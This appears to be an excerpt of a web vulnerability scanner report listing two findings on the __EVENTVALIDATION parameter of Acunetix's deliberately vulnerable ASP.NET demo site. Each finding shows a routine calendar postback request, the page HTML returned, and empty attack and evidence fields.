Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8318&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDA8F9SqtoIZGRkYqLrwYHiGqf5j1KLNrt2wlfg%2FCo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLB7Iy8BwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gKKmHOOSYavzlu7%2B%2FSIvgowOvBkEg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:30 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDA8F9SqtoIZGRkYqLrwYHiGqf5j1KLNrt2wlfg/Co=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLB7Iy8BwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gKKmHOOSYavzlu7+/SIvgowOvBkEg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:White" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8249&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAcPEZdNoIZGRkjNCV0IaQqatQyOFT4G97gsJT4dA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLbpfDrAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268Dz%2F9A7%2Ba796Jn05j4iTgWBEiBjcY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:00 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAcPEZdNoIZGRkjNCV0IaQqatQyOFT4G97gsJT4dA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLbpfDrAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268Dz/9A7+a796Jn05j4iTgWBEiBjcY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:White" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
